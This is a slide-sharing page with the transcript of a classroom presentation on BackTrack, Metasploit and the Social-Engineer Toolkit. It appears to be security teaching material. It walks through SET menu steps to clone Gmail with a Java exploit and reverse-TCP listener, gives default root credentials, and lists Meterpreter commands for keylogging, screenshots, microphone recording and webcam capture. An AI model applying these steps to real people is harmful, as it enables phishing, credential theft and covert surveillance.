Backtrack Metasploit and SET

Slides:



Advertisements
Similar presentations
B: STUDENT DRIVE MOVE INSTRUCTIONS. Using Internet Explorer: From your computers desktop, double click on the Internet Explorer icon. (Internet Explorer.
Advertisements

Browser Exploitation Framework (BeEF) Lab
VMWare Workstation Installation. Starting Vmware Workstation Go to the start menu and start the VMware Workstation program. *Note: The following instructions.
Raspberry Pi Training Truman College Goals of our Training Today Unbox and boot up the Raspberry Pi (RPi) Learn how to access the desktop graphical.
Browser Comparisons - Convenience Internet Explorer 8 & 9, Chrome 11 and Firefox 4 Searching, Convenience & Add-ons.
Eucalyptus Virtual Machines Running Maven, Tomcat, and Mysql.
Module 4: Add Client Computers and Devices to the Network.
N ETWORKED & D ISTRIBUTED COMPUTING S YSTEMS L AB Programming Assignments EE323 Computer Networks.
bWAPP – Bee Bug – Installation
Hands-On Virtual Computing
Web Browser Security Prepared By Mohammed EL-Batta Mohammed Soubih Supervised By Eng. Eman alajrami Explain Date 10. may University of Palestine.
Microsoft Internet Explorer and the Internet Using Microsoft Explorer 5.
Kali Linx Attacks Jim Nasto. Window 8 Computer On my Windows 8 64 bit OS machine. I started using a Virtual Machine using Hyper V Manager and shared the.
Client-based Application Attacks Adli Abdul Wahid Dept. of Comp. Science, IIUM
Proxy Installer for Windows Squid: Squid is a caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. It reduces bandwidth and improves response.
Penetration Testing 101 (Boot-camp)
Social Engineering Toolkit Computer Science Innovations, LLC.
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.
1 Terminology. 2 Requirements for Network Printing Print server Sufficient RAM to process documents Sufficient disk space on the print server.
VMWare Workstation Installation. Starting Vmware Workstation Go to the start menu and start the VMware Workstation program. *Note: The following instructions.
Thực hiện: D3 GVLT: BROWERS. Browser Compatibility I Check the compatibility II Tools III.
JMU GenCyber Boot Camp Summer, “Canned” Exploits For many known vulnerabilities attackers do not have to write their own exploit code Many repositories.
APACHE INSTALL Linux: CentOS 6.5 WHAT IS APACHE Apache is an open source application which is governed by the GNU licensing for use and alteration of.
Proctor Caching Overview. 2 Proctor Caching Diagram.
Windows Server 2003 { First Steps and Administration} Benedikt Riedel MCSE + Messaging
APACHE INSTALL AWS Linux (Amazon Web Services EC2)
Common System Exploits Tom Chothia Computer Security, Lecture 17.
WHAT ARE THE STEPS TO CONNECT MY HP DESKJET 3520 TO WI-FI?
GNU and Linux.
Web and Proxy Server.
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Virtual Machine and VirtualBox
The Internet.
Computing and Information Technology Building a Web Browser
Intro to Ethical Hacking
Tonga Institute of Higher Education IT 141: Information Systems
Web Application Penetration Testing ‘17
Hacking SQL Server a peek into the dark side by Dustin Prescott
Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT
Hacking SQL Server The best defense is a good offence by Dustin
100% REAL EXAM QUESTIONS ANSWERS
Remote Access: Guide for Windows
Grades4sure PDF Dumps CompTIA Security + Certification Exam
Networking & Wireless Routers II Driver Installation
Backdoor Attacks.
Malware Reverse Engineering Process
~ How to create a basic website Part II ~
CIT 480: Securing Computer Systems
Creating a Windows 10 Virtual machine
Bomgar Remote support software
Microsoft FrontPage 2003 Illustrated Complete
The Hacking Suite for Governmental Interception
Using Various Internet Browsers
Cyber intelligence made easy.
Intro to Ethical Hacking
Installing OpenRefine
Tonga Institute of Higher Education IT 141: Information Systems
Tom Chothia Computer Security
Cyber Operation and Penetration Testing Online Password Cracking Cliff Zou University of Central Florida.
Connecting Remotely Winter 2014.
Tonga Institute of Higher Education IT 141: Information Systems
INTERNET SECURITY.
Virtual Machine and VirtualBox
Cyber Operation and Penetration Testing Armitage: Metasploit GUI and Machine-Gun Style Attack Cliff Zou University of Central Florida.
Virtual Machine and VirtualBox
Skype For Business Introduction
Virtual Machine and VirtualBox
Internet Vocabulary Beth Felton McKelvey.
Chloe Riley | Research Commons Librarian |
Presentation transcript:

Backtrack Metasploit and SET

BackTrack A Linux distribution designed for penetration testing, aka "ethical hacking" Many, many tools for hacking into any type of system, wireless or wired A huge library of drivers and support routines Backtrack 4 is based on Ubuntu Linux

Downloads http://www.backtrack-linux.org Available as a bootable DVD or a pre-installed virtual machine (VM) The DVD can be used for computer forensics, but Raptor is better for that The VM is best for most classroom demonstrations and projects

BackTrack Gotchas You need to log in to start it User name: root Password: toor The graphical desktop does not start by default # startx

BackTrack Gotchas Networking is not started by default Because you may be trying to conceal your presence To start networking: # /etc/init.d/networking start To renew a DHCP address # dhclient

Metasploit

Metasploit Framework Makes it easy to rapidly add new attacks Attacks are often added before patches exist, creating "Zero-Day" attacks I typically assign several zero-day attacks per semester now as homework It's not supposed to work this way; cyberspace is really dangerous these days

Cross-platform Metasploit runs on Windows, Linux, or Unix But the Windows version doesn't have all the new attacks Installing it on Linux can be frustrating because it needs libraries and drivers

The Solution Backtrack contains Metasploit, with all the required support modules included This saves students many hours

SET Social-Engineer Toolkit

SET uses Metasploit There is a "social engineering" aspect in most hacking Tricking a user into making a mistake, that lets you in Clicking a link Ignoring an error message Opening an attachment Etc.

Today's Attack Target: Win 7 Vuln: Java 0-Day

Evil Web Server Attacker: Evil Web Server with Cloned Gmail Page Java Exploit Code Added to Web Page Target Using Gmail

DEMO

Dave Kennedy & Kevin Mitnick Made this Video

Preparation Download Backtrack 4 R 2 Virtual Machine Run it in VMware Workstation Get it networking to the Internet and the target—"Bridged" is best

Commands Enter option 2: Website Attack Vectors cd /pentest/exploits/SET ./set Enter option 2: Website Attack Vectors Enter option 1: The Java Attack Method Enter option 2: Site Cloner Enter url https://gmail.com It asks you "What payload do you want to generate:" and lists 11 choices Press Enter for default It shows a list of 16 encodings to try and bypass AV. It asks you to "Enter the PORT of the listener (enter for default): It asks you whether you want to create a Linux.OSX reverse_tcp payload. Enter no It now shows blue text saying: [*] Launching MSF Listener... [*] This may take a few to load MSF... Wait... When it's done, you will see a whole screen scroll by as Metasploit launches, ending with this message: msf auxiliary(smb) >

On the Target Open a Web browser and go to the Metasploit IP address Works on IE, Firefox, and Chrome User will see this warning box Studies show that users almost always just click past those warning boxes

GAME OVER The target is now owned. We can Capture screenshots Capture keystrokes Turn on the microphone and listen Turn on the webcam and take photo Steal password hashes Etc.

Fun & Games To remotely control the target: Commands to try: sessions -i 1 Commands to try: screenshot keyscan_start keyscan_stop record_mic 10 webcam_list webcam_snap 1

Protecting Yourself

The Usual Stuff This stuff is all helpful Get Antivirus, like Microsoft Security Essentials Install patches (when they exist) Get a Mac Keep image-based backups so you can recover after an infection But none of it can really save you

Attack > Defense Even corporate desktop computers are infected The Chinese got into Google and >30 other huge companies last year Don't imagine you are immune